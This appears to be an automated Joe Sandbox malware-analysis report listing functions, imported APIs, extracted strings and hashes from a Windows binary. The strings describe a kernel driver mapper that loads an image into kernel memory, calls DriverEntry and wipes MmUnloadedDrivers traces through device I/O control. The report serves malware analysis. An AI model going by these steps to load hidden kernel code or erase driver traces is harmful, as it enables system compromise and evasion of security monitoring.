                                                                                          • Opcode ID: a1f9855e7963576bdf95c24cd32f05eedc5230692104ab97f89fb7bbed59ddc6
                                                                                          • Instruction ID: 2fb0671df848f746e411787a5393b263c7dc042e2b9652c07df29f58b7003a08
                                                                                          • Opcode Fuzzy Hash: a1f9855e7963576bdf95c24cd32f05eedc5230692104ab97f89fb7bbed59ddc6
                                                                                          • Instruction Fuzzy Hash: 61426E72B18B8189E700EF61E4402EDBBB5EB487A8F909536DA8D17B59DF3CD245C320
                                                                                          Function 00007FF7CC416810 Relevance: 42.3, APIs: 16, Strings: 8, Instructions: 338nativememoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: V01@$ControlDevice$Virtual$??6?$basic_ostream@D@std@@@std@@FreeU?$char_traits@V01@@$InformationQuerySystem$AllocCurrentProcessmemset
                                                                                          • String ID: 0$[!] Failed to find device_object$[!] Failed to find driver name$[!] Failed to find driver_object$[!] Failed to find driver_section$[!] Failed to read driver name$[!] Failed to write driver name length$[+] MmUnloadedDrivers Cleaned:
                                                                                          • API String ID: 48251577-3329613743
                                                                                          • Opcode ID: 3575150da220efd6ffb7dc57c2255807822c993415969e1ebdd93622c0f9fa6e
                                                                                          • Instruction ID: 232bc270ed0b9949634f361007b04c8b032b10047658fd32318a7bcb099f31e7
                                                                                          • Opcode Fuzzy Hash: 3575150da220efd6ffb7dc57c2255807822c993415969e1ebdd93622c0f9fa6e
                                                                                          • Instruction Fuzzy Hash: 5EF18022B18B818AE700DF61E4402ECBBB5EB4979CB948535DE4D27B59DF3CD645C320
                                                                                          Function 00007FF7CC423B60 Relevance: 33.2, APIs: 22, Instructions: 224fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handleabort
                                                                                          • String ID:
                                                                                          • API String ID: 4293554670-0
                                                                                          • Opcode ID: 0658ebe21b7779fd09a5f58bc469b15e87cc917d8bac635e3e8b3ddf396c297c
                                                                                          • Instruction ID: 1f5d896f77706fea627a03d14452e2534e0ac6d83e067096b4728b1aa9b23678
                                                                                          • Opcode Fuzzy Hash: 0658ebe21b7779fd09a5f58bc469b15e87cc917d8bac635e3e8b3ddf396c297c
                                                                                          • Instruction Fuzzy Hash: 0391EB32B08AC242E678AF15A406675EBB5AF847B8F848330DA7D437D5DF3CE6458720
                                                                                          Function 00007FF7CC416440 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 243memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: Virtual$Free$ControlDevice$Alloc_invalid_parameter_noinfo_noreturn_stricmpmemset
                                                                                          • String ID: 0$@
                                                                                          • API String ID: 2904545761-1545510068
                                                                                          • Opcode ID: f271814436e411f149ca223381442c2e1ac6ccb45c9758756a7aef138bd86b92
                                                                                          • Instruction ID: 673b53e771c776444308e5eaaf5b0fbfe7d7bc8a8e928ed6ed5da584c70748fa
                                                                                          • Opcode Fuzzy Hash: f271814436e411f149ca223381442c2e1ac6ccb45c9758756a7aef138bd86b92
                                                                                          • Instruction Fuzzy Hash: 87A1B472F08B8185EB10DF25E4403ADABA5FB487A8F908235DA9D53B98DF3CD581C750
                                                                                          Function 00007FF7CC4232C0 Relevance: 13.6, APIs: 9, Instructions: 141nativememoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: Virtual$Free$InformationQuerySystem$Alloc_invalid_parameter_noinfo_noreturn_stricmp
                                                                                          • String ID:
                                                                                          • API String ID: 562193759-0
                                                                                          • Opcode ID: 659d89a33b8c4e84e73f9b44b03caa3a4d5bd46a419bca97b8d83545358b8e36
                                                                                          • Instruction ID: f1698d1698b894bf77bf9f03e9dc7006cd90b1f4abeefd354ec576eadab6bf9c
                                                                                          • Opcode Fuzzy Hash: 659d89a33b8c4e84e73f9b44b03caa3a4d5bd46a419bca97b8d83545358b8e36
                                                                                          • Instruction Fuzzy Hash: CA51DA61B0858142EB25EF15E80537AEA76FF85BF8F84C231DA5D876D4DE3CE6418710
                                                                                          Function 00007FF7CC424B58 Relevance: 13.6, APIs: 9, Instructions: 71COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 313767242-0
                                                                                          • Opcode ID: 0a08945691a620697485375cb202d0f93b674166cfe272dc12a460a651dbbd82
                                                                                          • Instruction ID: 8cfb9182fa5daaca43f5a22b1a0f31bf9f0ef1942a7dc130eaec36b921cd05dd
                                                                                          • Opcode Fuzzy Hash: 0a08945691a620697485375cb202d0f93b674166cfe272dc12a460a651dbbd82
                                                                                          • Instruction Fuzzy Hash: C0313E72608BC186EB609F60E8413FDB764FB84758F84803ADA4E47B95DF38D648C720
                                                                                          Function 00007FF7CC41FBF0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 250COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CC41FF93
                                                                                            • Part of subcall function 00007FF7CC424108: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7CC41CF43,?,?,?,?,?,0000000100000000,00007FF7CC4199B2), ref: 00007FF7CC424122
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC41FF8C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                                                          • String ID: gfffffff$gfffffff
                                                                                          • API String ID: 1934640635-161084747
                                                                                          • Opcode ID: 32d287f5089f1c4019f492f4e82f17f276e333e0f2eac9d65bf056a087128946
                                                                                          • Instruction ID: f274b28727eb7812dfff013136b88ae41328791d87400455b671120ad5470b09
                                                                                          • Opcode Fuzzy Hash: 32d287f5089f1c4019f492f4e82f17f276e333e0f2eac9d65bf056a087128946
                                                                                          • Instruction Fuzzy Hash: A0A1DFA2B14BC982EA00DF16E44426DB7A4F758B98FA09232DF8D47755DF38E6D2C300
                                                                                          Function 00007FF7CC424D6C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                          • String ID:
                                                                                          • API String ID: 2933794660-0
                                                                                          • Opcode ID: 58ad573f1b6cc880fa708dd3b815a5a05b201a521b9c08ca75221f68de6631f4
                                                                                          • Instruction ID: 18fe863d56a13eed63544e46102c353230843bb12c89bf170f91957212f45f83
                                                                                          • Opcode Fuzzy Hash: 58ad573f1b6cc880fa708dd3b815a5a05b201a521b9c08ca75221f68de6631f4
                                                                                          • Instruction Fuzzy Hash: 9211C222B14F418AEB00DF60E8452B873B0F74876CF840E31DA2D427A8DF3CE2548350
                                                                                          Function 00007FF7CC4238A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: FormatInfoLocaleMessage
                                                                                          • String ID: !x-sys-default-locale
                                                                                          • API String ID: 4235545615-2729719199
                                                                                          • Opcode ID: ce0abaa9da4b8b40a8a02033c447ee2787cd80be453fa13a0568637d961edfc7
                                                                                          • Instruction ID: 875a26b23f994507c46e43be131be369d52e387ee69c98fbd385c141c4fd777a
                                                                                          • Opcode Fuzzy Hash: ce0abaa9da4b8b40a8a02033c447ee2787cd80be453fa13a0568637d961edfc7
                                                                                          • Instruction Fuzzy Hash: 7901A171E087C182E7149F11B4017AAEAA6FB847A8F84C035DA8907A95CF3CD604C710
                                                                                          Function 00007FF7CC424D00 Relevance: .0, Instructions: 2COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7968070e1f2d13b7acf864d44870ea5513e90aff6d164408a12cac6280b5e324
                                                                                          • Instruction ID: bf9da3b003ae7171d83da0e7ce58dce04bc07c659d2d2dc00ed010659843585a
                                                                                          • Opcode Fuzzy Hash: 7968070e1f2d13b7acf864d44870ea5513e90aff6d164408a12cac6280b5e324
                                                                                          • Instruction Fuzzy Hash: BBA002A1A1CC82E4EB45FF00FC52070EB70FB50368BD09471D51D528A19F3CEA44D764
                                                                                          Function 00007FF7CC41E020 Relevance: 73.9, APIs: 24, Strings: 18, Instructions: 377memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VirtualAlloc.KERNEL32 ref: 00007FF7CC41E0B0
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@PEBX@Z.MSVCP140 ref: 00007FF7CC41E283
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41E293
                                                                                          • memmove.VCRUNTIME140 ref: 00007FF7CC41E2A3
                                                                                          • memmove.VCRUNTIME140 ref: 00007FF7CC41E2D8
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF7CC41E31A
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF7CC41E326
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41E345
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41E60D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: V01@$??6?$basic_ostream@??6?$basic_ostream@_D@std@@@std@@U?$char_traits@U?$char_traits@_V01@@W@std@@@std@@$memmove$AllocV21@@Vios_base@1@Virtual
                                                                                          • String ID: bytes of PE Header$ExAllocatePoolWithTag$[!] Failed to find ExAllocatePool$[+] DriverEntry returned 0x$[+] Freeing memory$[+] Image base has been allocated at 0x$[+] Memory has been released$[+] Skipped 0x$[-] Callback returns false, failed!$[-] Failed to allocate remote image in kernel$[-] Failed to call driver entry$[-] Failed to fix cookie$[-] Failed to resolve imports$[-] Failed to write local image to remote image$[-] Image is not 64 bit$[-] Invalid format of PE image$[-] WARNING: Failed to free memory!$[<] Calling DriverEntry 0x
                                                                                          • API String ID: 3661745735-2368498643
                                                                                          • Opcode ID: 793d186afd701ffc3feeccafb3c296f166acf9444246a768472353144e4d0500
                                                                                          • Instruction ID: 84c4137ac9ea20d381864dd2268d28165a1d9fa7118a26615c5285cabfb418fd
                                                                                          • Opcode Fuzzy Hash: 793d186afd701ffc3feeccafb3c296f166acf9444246a768472353144e4d0500
                                                                                          • Instruction Fuzzy Hash: 2A026865F08AC285EA10EF61E8456B8AB62BF45BA8FD0C031DD4D4769ADF3CE645C360
                                                                                          Function 00007FF7CC41D8F0 Relevance: 42.3, APIs: 11, Strings: 13, Instructions: 289COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC41D9D3
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41DA13
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC41DB2A
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41DB6D
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41DC60
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC41DC20
                                                                                            • Part of subcall function 00007FF7CC41C9F0: memmove.VCRUNTIME140 ref: 00007FF7CC41CA28
                                                                                            • Part of subcall function 00007FF7CC416440: memset.VCRUNTIME140 ref: 00007FF7CC416491
                                                                                            • Part of subcall function 00007FF7CC416440: DeviceIoControl.KERNEL32 ref: 00007FF7CC416510
                                                                                            • Part of subcall function 00007FF7CC416440: DeviceIoControl.KERNEL32 ref: 00007FF7CC4165B0
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41DA36
                                                                                            • Part of subcall function 00007FF7CC424090: AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00007FF7CC416ECE,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CC4174F3), ref: 00007FF7CC4240A0
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC41DD27
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41DD67
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41DD8A
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41DDD3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@$ControlDevice_invalid_parameter_noinfo_noreturn$AcquireExclusiveLockmemmovememset
                                                                                          • String ID: 0$MmAllocatePagesForMdl$MmMapLockedPagesSpecifyCache$MmProtectMdlSystemAddress$[!] Failed to find MmAlocatePagesForMdl$[!] Failed to find MmMapLockedPagesSpecifyCache$[!] Failed to find MmProtectMdlSystemAddress$[+] Allocated pages for mdl$[-] Can't allocate pages for mdl$[-] Can't change protection for mdl pages, cleaning up$[-] Can't read the _MDL : byteCount$[-] Can't set mdl pages cache, cleaning up.$[-] Couldn't allocate enough memory, cleaning up
                                                                                          • API String ID: 2001844386-3948469999
                                                                                          • Opcode ID: 655b52af58247cf43af727550287d73903cfe6b9655883f29f5227e71485c835
                                                                                          • Instruction ID: 4a0c3aadeb6de083da98beca3dbde58121b2f49f5125e4290d738481fd800580
                                                                                          • Opcode Fuzzy Hash: 655b52af58247cf43af727550287d73903cfe6b9655883f29f5227e71485c835
                                                                                          • Instruction Fuzzy Hash: 4DE16062E18BC295EA00FF65E8412B8AB61AF447BCFD4D231D95D52695EF3CE345C320
                                                                                          Function 00007FF7CC415A80 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 211COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A43A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CC41A45A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A46A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC41A54D
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CC41A554
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CC41A561
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC415AD0
                                                                                          • CloseHandle.KERNEL32 ref: 00007FF7CC415AE3
                                                                                            • Part of subcall function 00007FF7CC4145E0: memset.VCRUNTIME140 ref: 00007FF7CC414325
                                                                                            • Part of subcall function 00007FF7CC4145E0: GetTempPathW.KERNEL32 ref: 00007FF7CC414333
                                                                                            • Part of subcall function 00007FF7CC4145E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC414453
                                                                                          • CloseHandle.KERNEL32 ref: 00007FF7CC415AF6
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC415B56
                                                                                          • memset.VCRUNTIME140 ref: 00007FF7CC415B85
                                                                                            • Part of subcall function 00007FF7CC4189C0: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CC4189F3
                                                                                            • Part of subcall function 00007FF7CC4189C0: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7CC418A12
                                                                                            • Part of subcall function 00007FF7CC4189C0: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CC418A44
                                                                                            • Part of subcall function 00007FF7CC4189C0: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7CC418A5F
                                                                                            • Part of subcall function 00007FF7CC4189C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC418AA9
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC415BCA
                                                                                            • Part of subcall function 00007FF7CC419EF0: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF7CC411EB3,?,?,00000000,00007FF7CC411D97), ref: 00007FF7CC419F50
                                                                                            • Part of subcall function 00007FF7CC419EF0: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF7CC411EB3,?,?,00000000,00007FF7CC411D97), ref: 00007FF7CC419F72
                                                                                          • rand.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 00007FF7CC415BD0
                                                                                          • rand.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 00007FF7CC415BD9
                                                                                          • rand.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 00007FF7CC415C26
                                                                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J@Z.MSVCP140 ref: 00007FF7CC415C64
                                                                                          • ??7ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC415C74
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC415CA2
                                                                                          • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC415CCF
                                                                                          • _wremove.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 00007FF7CC415CEE
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CC41A4B7
                                                                                          • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CC415D71
                                                                                          • ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CC415D7C
                                                                                          • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CC415D86
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC415DC6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
